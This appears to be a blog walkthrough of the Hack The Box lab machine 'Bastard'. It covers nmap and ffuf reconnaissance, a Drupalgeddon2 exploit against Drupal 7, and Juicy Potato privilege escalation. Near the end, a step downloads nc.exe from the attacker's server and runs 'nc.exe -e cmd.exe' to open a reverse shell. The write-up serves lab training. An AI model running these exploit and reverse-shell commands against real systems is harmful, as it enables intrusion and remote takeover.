Post

Bastard Write up

Posted
By thehunt1s0n 2 min read

Welcome to my Bastard’s Write-up

Recon

Nmap

$ sudo nmap -sSVC -A -oA nmap/bastard 10.10.10.9


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
$ nmap -Pn -A -sC -T4 10.10.10.9


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$ nmap -p- -Pn -A -T4 10.10.10.9


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.11s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-title: Welcome to Bastard | Bastard
|_http-server-header: Microsoft-IIS/7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC

Directory Bruteforce

$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://bastard.htb/FUZZ


image 1

HTTP (PORT 80)

http://10.10.10.9/

image 2

Wappalyzer gave me this output:

image 3

Seems like the website is running on Drupal 7

Initial Foothold

image 4

https://www.exploit-db.com/exploits/44449

image 5

$ ruby Drupalgeddon2.rb http://10.10.10.9


image 6

image 7

Privelege Escalation

We will be using juicy potato for privilege escalation.

gif

The script can be found in here:

https://github.com/ohpe/juicy-potato

Set a netcat listener.

$ nc -lvp 4443


Also we need to import nc to the victim’s machine.

$ python -m SimpleHTTPServer 8000


Import the nc.exe file into the target using wget. (we can also use certutil and iwr for powershell).

c:\users\public> wget http://10.10.14.33:8000/nc.exe


Run the exploit using this clsid.

c:\users\public> JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a “/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.33 4443” -t * -c {9B1F122C-2982–4e91-AA8B-E071D54F2A4D}


image 9

writeup
hackthebox
This post is licensed under CC BY 4.0 by the author.